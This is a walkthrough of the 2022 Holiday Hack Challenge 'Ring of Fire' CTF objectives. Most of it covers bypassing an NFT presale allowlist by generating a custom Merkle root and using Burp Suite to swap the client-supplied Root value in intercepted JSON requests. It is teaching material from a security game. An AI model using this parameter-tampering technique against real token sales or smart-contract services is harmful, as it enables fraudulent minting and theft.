HHC 2022 - Ring of Fire Walkthrough

The walkthrough for the Ring of Fire, the LAST of 5 rings in the 2022 Holiday Hack Challenge! GLORY!

HHC 2022 - Ring of Fire Walkthrough

These set of challenges will be unique to each user - meaning many of the values used throughout the walkthroughs are tied to the user's Wallet Address, Key, and other related values. It is likely that copying and pasting commands verbatim from this walkthrough will NOT lead to a valid answer.  Be sure to follow the instructions carefully.  If you do, you will receive much GLORRRYYYYYYYY!

5.1 Buy a Hat

Objective

Travel to the Burning Ring of Fire and purchase a hat from the vending machine with KringleCoin. Find hints for this objective hidden throughout the tunnels.

Hints

  • Before you can purchase something with KringleCoin, you must first approve the financial transaction. To do this, you need to find a KTM; there is one in the Burning Ring of Fire. Select the Approve a KringleCoin transfer button. You must provide the target wallet address, the amount of the transaction you're approving, and your private wallet key.
  • To purchase a hat, first find the hat vending machine in the Burning Ring of Fire. Select the hat that you think will give your character a bold and jaunty look, and click on it. A window will open giving you instructions on how to proceed with your purchase.
  • You should have been given a target address and a price by the Hat Vending machine. You should also have been given a Hat ID #. Approve the transaction and then return to the Hat Vending machine. You'll be asked to provide the Hat ID and your wallet address. Complete the transaction and wear your hat proudly!

Walkthrough

We click on the vending machine located inside the Burning Ring of Fire Hall.  It displays a large selection of hats.We find a hat that we like, or just one we find tolerable enough to complete the task.

A prompt loads with the instructions.

To purchase this hat you must:

  1. Use a KTM to pre-approve a 10 KC transaction to the wallet address: 0x4228cc9639304eD6Ef0Ba5668964348eC9D47d9A
  2. Return to this kiosk and use Hat ID: 526 to complete your purchase.
Note: the Wallet address will be the same for every hat. However, the Hat ID is specific to the one you selected.

We need the private key and Wallet address that was given to us during the initial setup of the game, all the way back during Orientation.

Using the KC ATM

We navigate to the KC ATM, located to the right of the vending machine., and click Approve a KirngleCoin transfer.

Enter the following values:

  • "To" Address: 0x4228cc9639304eD6Ef0Ba5668964348eC9D47d9A
  • Amount (KC): 10
  • Your Key: <Your Key>
Note: Be sure to enter your Key value and not your WalletAddress value. Entering in the latter will likely prevent a successful transfer from occurring.

Click Approve Transfer.

Navigate back to the vending machine, click on it and select the Click Here to buy

Enter the following values into the text fields:

  • Your Wallet Address: <Your WALLETADDRESS! >
Note: this is NOT your Key. Entering your key will likely generate an error message. Be sure to enter your WalletAddress, which was generated during Orientation.
  • Hat ID: 526
Note: using the example from above, we enter 526. If you chose a different Hat, use the corresponding Hat ID.

Click on Make your purchase!

5.2 Blockchain Divination

Objective

Use the Blockchain Explorer in the Burning Ring of Fire to investigate the contracts and transactions on the chain. At what address is the KringleCoin smart contract deployed? Find hints for this objective hidden throughout the tunnels.

Hints

  • Find a transaction in the blockchain where someone sent or received KringleCoin! The Solidity Source File is listed as KringleCoin.sol. Tom's Talk might be helpful!
  • Look at the transaction information. There is a From: address and a To: address. The To: address lists the address of the KringleCoin smart contract.

Walkthrough

So the hints lay the steps out fairly directly.  The trickiest part might be to find the blockchain explorer - which is located on the lower level of the Burning Ring of Fire Hall.  Descend the ladder, and move to the back corner of the lower level.  Click on the computer located in the very last space of the room.  If a page loads that says BSRS with a Sporc skull, you haven't traveled far enough, move farther to the right, and click on the beige-ish looking computer.

Clicking on the proper terminal loads the Blockchain Explorer (in the title). We look for a transaction with solidity source code that mentions Kringlecoin, for example this is from Block# 77961, using the arrows on the top of the Blockchain Explorer:

Within the block, we look for the "to" value:

Answer

Enter the address as the value within the Objectives pane: 0xc27A2D3DE339Ce353c0eFBa32e948a88F1C86554

5.3 Exploit a Smart Contract

Objective

Exploit flaws in a smart contract to buy yourself a Bored Sporc NFT. Find hints for this objective hidden throughout the tunnels.

Smart Contract Hints

Walkthrough

We navigate to the web page that shows the BSRS web page.  The terminal/screen is located just below the "BSRS" sign.  Click on the web page.

Click on the Presale link at the top of the page.  This loads the instructions to mint a BSRB. The instructions are a general framework of how to attack the smart contract, so be sure to read carefully:

Pre-Purchase Instructions

Here's all you gotta do to pre-purchase your Sporc:

1.  The presale price for a Sporc is 100 KringleCoin (KC). Yeah, we know that's crazy cheap, but we take care of our buds. When we open sales to the public, these things are gonna shoot to the moon.
2.  First, you're gonna want to make sure that your wallet address is on the approved list. Just make sure to leave the "Validate only" box checked, fill in the form, and we'll let you know if you're good-to-go. Before you do anything else, it's always good to be sure you're doing everything right and your address is validated as being on the list (it's actually something called a Merkle Tree... very high-techy-techy stuff).
3.  To check if you're on the list, enter your wallet address and the string of proof values that we gave you when we told you that you were on the pre-approved list. Those values should be hex strings (i.e. start with "0x" and consist of a bunch of values that are 0-9 or "a," "b," "c," "d," "e," or "f"). If you're confused, give us a shout and we can help.
4.  If you're not on the presale list, **_you're not on the list_**. Don't beg and plead with us to put you on the list. Seriously - we've only put Sporcs that we're tight with on the list. _**WE**_ decided who's on the list (COOL SPORCS ONLY). We don't just let **_anyone_** on. If we were putting you on the list, we would've contacted you... not the other way around.
5.  Once you've confirmed everything works and you're sure you have the whole _validated-and-on-the-list_ thing down, just go find a KTM and pre-approve a 100 KC transaction from the wallet you validated. That way, the funds are ready to go. Our Wallet Address is 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.
6.  Once you've pre-approved the payment, come back here do the same thing you did when you validated your address, just uncheck the "Validate Only" thing. Then, we'll grab your K'Coin, mint a brand spankin' new Sporc, and fire it into your wallet. Zap! Just like that, you'll be the owner of an amazing piece of the digital domain and a member of the Bored Sporc Rowboat Society for life! (Or, until you decide to cash-out and sell your Bored Sporc).

Scrolling down further on the Presale page shows a form, with text fields to enter a Wallet Address, a Proof Values, and a Validate Only checkbox (which is checked by default).

If you're reading this and thinking "I never joined a presale list", the goal will be to attack the blockchain to make it appear as if you had.

We will need to collect a few things in order to "attack" the blockchain.

Step 2 - Validate Wallet Address

Following the [[#Pre-Purchase Instructions]], we proceed at Step 2.

The subsequent sections that refer to "Step X" are also referring to the Pre-Purchase instructions step.

Cloning the Github Repo

The hint mentions a Github Repo that "might be useful" (read: you'll want to use it). Clone the repo using git clone into your local system.  It loads a merkle_tree.py file, which will be leveraged for the attack.  Be sure to reference the [[#Smart Contract Hints]] which provides a few links for additional context around merkle trees.

Editing & Running merkle_tree.py

Edit the merkle_tree.py file, and specifically edit line 150.   Set the value of allowlist to be a list.  The first value of the list should be YOUR Wallet address (will vary from the one displayed below). The second value of the list, should be the address of BSRS, 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.

┌──(kali㉿kali)-[~/…/CTFs/holidayhack2022/ringoffire/Merkle_Trees]
└─$ cat merkle_tree.py | grep -n ^allowlist                                       
150:allowlist = ['YOUR-KRINGLECOIN-WALLETADDRESS-HERE','0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a']

Note: it is important to make the list in the order of allowlist[0] = <Your wallet Address Here> and allowlist[1] = 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.  Doing it in any other order generates the incorrect proof value.

Run the merkle_tree.py script which will generate a Root and Proof Value.

┌──(kali㉿kali)-[~/…/CTFs/holidayhack2022/ringoffire/Merkle_Trees]
└─$ python3 merkle_tree.py                                                                                       1 ⚙
Root: 0xe62e314a4c8f25fae3edd0a22d95d6d33a2f2f88ccebaadc71be8cd86224ded9
Proof: ['0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860']

Intercepting the Pre-Sale Validation

We navigate back to the BSRS Pre-Sale page, turn Burpsuite Intercept on, and enter our wallet adress, and the Proof value from the merkle_tree.py script into the Proof Value field.  We also ensure the Validate Only box is checked, and click Go!

We intercept the POST request to /cgi-bin/presale, and change the value of the payload.

From this:


{"WalletID":"0x3Fa400B96Cf38697f58C57885148e18875bA5b98",
 "Root":"0x52cfdfdcba8efebabd9ecc2c60e6f482ab30bdc6acf8f9bd0600de83701e15f1",
 "Proof":"0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860",
 "Validate":"true",
 "Session":"4d3a6708-8598-4f83-8bb6-e2c98b243924"}

To this:

{"WalletID":"0x3Fa400B96Cf38697f58C57885148e18875bA5b98",
 "Root":"0xe62e314a4c8f25fae3edd0a22d95d6d33a2f2f88ccebaadc71be8cd86224ded9",
 "Proof":"0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860",
 "Validate":"true",
 "Session":"4d3a6708-8598-4f83-8bb6-e2c98b243924"}

Replacing the value of Root, to the output from our merkle_tree.py script (EACH ROOT VALUE WILL BE SPECIFIC TO EACH USER, DO NOT COPY IN THE VALUES FROM THIS WALKTHROUGH).  Send the edited request along, and we receive a response:

{"Response": "You're on the list and good to go! Now... BUY A SPORC!"}

Step 5 - Send 100 KC to BSRS

Don't worry, we send 100 KC away, but will receive 100 KC as a result of completing this challenge.  (We'll still have plenty of KC to stake in the near future!! GLORRRYYYY! Apologies for the redundant cryptocurrency joke)

We navigate back to the KC ATM on the floor above, and just like in the [[#Using the KC ATM]] steps, repeat them but use the following values:

  • "To" Address: 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a
  • The address of the BSRS
  • Amount (KC): 100
  • Your Key: <Your Key value received during KringleCon Orientation>

Click Approve Transfer.

Step 6 - Mint a Sporc

Repeat the steps found in [[#Intercepting the Pre-Sale Validation]]. Enter the same values in the Wallet Address and Proof Values.  The distinguishing change from Step 2, is to make sure that the Validate Only button is unchecked.  In the burpsuite request, this will show as "Validate:"false. Make sure Burpsuite Intercept is on,

Original Requet:

{"WalletID":"0x3Fa400B96Cf38697f58C57885148e18875bA5b98",
 "Root":"0x52cfdfdcba8efebabd9ecc2c60e6f482ab30bdc6acf8f9bd0600de83701e15f1",
 "Proof":"0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860",
 "Validate":"false",
 "Session":"f38146a3-731b-4b85-8b20-433f5712c0b8"}

Edited request:

{"WalletID":"0x3Fa400B96Cf38697f58C57885148e18875bA5b98",
 "Root":"0xe62e314a4c8f25fae3edd0a22d95d6d33a2f2f88ccebaadc71be8cd86224ded9",
 "Proof":"0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860",
 "Validate":"false",
 "Session":"f38146a3-731b-4b85-8b20-433f5712c0b8"}

Send the request along, and receive the response below from the server (hyperlink mentioned will be specific to each user):

{"Response": "Success! You are now the proud owner of BSRS Token #000284. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS284, or check it out in the gallery!<br>Transaction: 0x69e9747beef7deead79494b17645916ecde951a437f74b7442b54678352ab76e, Block: 78107<br><br>Remember: Just like we planned, tell everyone you know to <u><em>BUY A BoredSporc</em></u>.<br>When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!<br><br>The market will tank, but we'll all be rich!!!"}

https://boredsporcrowboatsociety.com/TOKENS/TOKENIMAGES/BSRS284.png

My Sporc is festive, and gives off a "it's cold outside" vibe.

GLORRRYYYYYY

We have successfully Recovered the Burning Ring of Fire, and recovered all 5 rings! We can navigate back to the North Pole (using the Destinations shortcut!) and enter Santa's Castle - located slightly northwest of the KringleCon entrance.  Enter and interact with each of the characters to finish the storyline, and even have an opportunity to buy some swag available only to those who complete the entire HHC!

More Walkthroughs

Below are the other walkthroughs for the 2022 Holiday Hack Challenge if you haven't completed the other rings: